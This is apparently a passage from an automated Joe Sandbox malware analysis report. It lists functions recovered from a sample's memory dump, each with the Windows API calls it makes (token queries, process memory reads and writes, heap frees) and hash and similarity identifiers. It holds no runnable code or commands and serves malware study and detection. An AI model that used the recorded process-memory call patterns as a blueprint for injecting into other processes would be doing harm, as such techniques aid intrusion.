                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01B5B56003057F9A1066215C42FAB735D9F92399B144021FE0A9B3C1E765EE98E2ED
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,00C1F64E,00C1545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C23170
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C231A5
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C231CC
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C231D9
                                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00C231E2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                            • Opcode ID: 349a53e037cacf38d5e27a0b7be5bb9afb18cd3acbfa75ced95e529e3c915e1c
                                                                                                                                                                                                                                                                            • Instruction ID: 9ffab4924d6e4b83417dbe2c41d806f8c7b44e40a16ebf3f584265147e50b485
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 349a53e037cacf38d5e27a0b7be5bb9afb18cd3acbfa75ced95e529e3c915e1c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F0128766806703BD7127775BC86F2F266DAFC13717200538F826D29D1EE39CB129221
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?,?,00C50C4E), ref: 00C5091B
                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50936
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50944
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?), ref: 00C50954
                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C50831,80070057,?,?), ref: 00C50960
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1c467eef1a91f78d61fcf4765ad7e138e3d94c85c5e6e18ec839b5272505cbfd
                                                                                                                                                                                                                                                                            • Instruction ID: 715bcbcc1599e93cf731c620e104e1722f73a6aed890977e23524b1321818bd6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c467eef1a91f78d61fcf4765ad7e138e3d94c85c5e6e18ec839b5272505cbfd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE017C7A600205AFEB104F55DC48B9E7BADEF44763F240124FD06E2256E771DE849BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C5F2AE
                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00C5F2BC
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00C5F2C4
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00C5F2CE
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4b15dd764daa5b437b13ad82f619a9ade2c93caec238746311c0028105df39cf
                                                                                                                                                                                                                                                                            • Instruction ID: d4af25d42f17c76aa8bb1618238626c90313c3a4dbbc180cde2131724bb355ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b15dd764daa5b437b13ad82f619a9ade2c93caec238746311c0028105df39cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC01AD74C01619DBDF04AFA4DC4CBEEBB78FF08312F00046AD902B22A0DB309599C7A9
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                                                                                                                            • Opcode ID: ee4a4a05bfc2b71799b7c8235401a65f21d42ef3c84c3dd806e97f41a58e2b46
                                                                                                                                                                                                                                                                            • Instruction ID: b6934e351d80c0feb1c769cd89cd87951b1004125fe4b2548ebf65d2437c8320
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee4a4a05bfc2b71799b7c8235401a65f21d42ef3c84c3dd806e97f41a58e2b46
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 230169B9601205BFDB124FA4DC4CF6E3BAEEF893A5B250414FC46C32A0DA31DD409B64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C51976
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51982
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51991
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51998
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C519AE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                            • Opcode ID: 641d76534a25b9f773a89903edc5de8b19dd23509bb72052911209b7efc64080
                                                                                                                                                                                                                                                                            • Instruction ID: 26fe28abe333c8d2c4bf0c5b190ff2f34beac7f03b24522c8b0aad19400ca210
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 641d76534a25b9f773a89903edc5de8b19dd23509bb72052911209b7efc64080
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCF03C79100301ABD7214FA4EC5DF5A3B6DEF896A1F140414FD46872A0CA70DA408B64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C51916
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C51922
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C51931
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C51938
                                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C5194E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                                                                                                                            • Opcode ID: 4efaa7dd4896743ef74ce025c935ce7660c40c1d243a68156a067d2a59504ca5
                                                                                                                                                                                                                                                                            • Instruction ID: 5f5c37f3eea83a69dcf803336922da9d087ec963fa9669cb2fb4cc65fbf7ad1f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4efaa7dd4896743ef74ce025c935ce7660c40c1d243a68156a067d2a59504ca5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF04979200302ABDB210FA5AC4DF5A3BADEF897A1F150414FE46DB2A1CB70DC40CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CCB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CD8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CE5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CF2
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60CFF
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00C60B24,?,00C63D41,?,00000001,00C33AF4,?), ref: 00C60D0C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                            • Opcode ID: bebd9c25d0e59e4721a78cc1716974b119fc4da9eab31cb2af19cf731f9560a4
                                                                                                                                                                                                                                                                            • Instruction ID: 1093c2132941346932f235df17ef4ceef13f4a1dfae391129f3020ca4f002771
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bebd9c25d0e59e4721a78cc1716974b119fc4da9eab31cb2af19cf731f9560a4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87019071800B159FCB30AF66D9C0817F7F5BE602153258A3ED1A762971C7B0AA45DF81
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C565BF
                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C565D6
                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00C565EE
                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00C5660A
                                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00C56624
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                            • Opcode ID: 58df53a3708c5ff114ea18b7bef342f5dec0bca453bdfd49c396f95208d0fbc5
                                                                                                                                                                                                                                                                            • Instruction ID: 86fedfa7161f1bc4394e8ea05f875fb6f99385308acfac928e296952aca4f5a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58df53a3708c5ff114ea18b7bef342f5dec0bca453bdfd49c396f95208d0fbc5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41013674540708ABEB215F10DD4EF9A7BB8FF10706F400659F597620E1EFF4AA988B58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAD2
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAE4
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DAF6
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DB08
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DB1A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: da9c4b83755836cf96b8301daa0e794ca584637607f754fbfd155495a71d865c
                                                                                                                                                                                                                                                                            • Instruction ID: 1ec6e407be6769bb5eabf8078e1a085b8d27d9e94859336db0758f0ad236a439
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da9c4b83755836cf96b8301daa0e794ca584637607f754fbfd155495a71d865c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F01D32584225BB8624EB68F986E1A77EDEE14721BA50C05F01BD7D41DB31FD80DAA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2262E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22640
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22653
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22664
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C22675
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: e3a2afeb8a35f1b713da80211537c754fae057af75cd848104622f97b75c8128
                                                                                                                                                                                                                                                                            • Instruction ID: e994c3dd7b806dde3dc93813d44860c49d9913964eee81a3a524cf11799e2526
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3a2afeb8a35f1b713da80211537c754fae057af75cd848104622f97b75c8128
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EF0FEB1841231AB8B12AF95FC01F4C3B64FF257627490A1AF815D66B5DB364901FFC4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                            • Opcode ID: 038cc3cc960952993e3895037344b46e8420442462dd78dcb1afd53969802b96
                                                                                                                                                                                                                                                                            • Instruction ID: 62cbaa0037c7bb378431f975bd994857eac8a11f507fdeec2817c8075f16ae3c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 038cc3cc960952993e3895037344b46e8420442462dd78dcb1afd53969802b96
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43D11275900226DACB249F68E845BFEB7B1FF65700F2C015AED269BE50D7358E80CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C52B1D,?,?,00000034,00000800,?,00000034), ref: 00C5BDF4
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C530AD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C52B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00C5BDBF
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00C5BD1C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C52AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C5BD2C
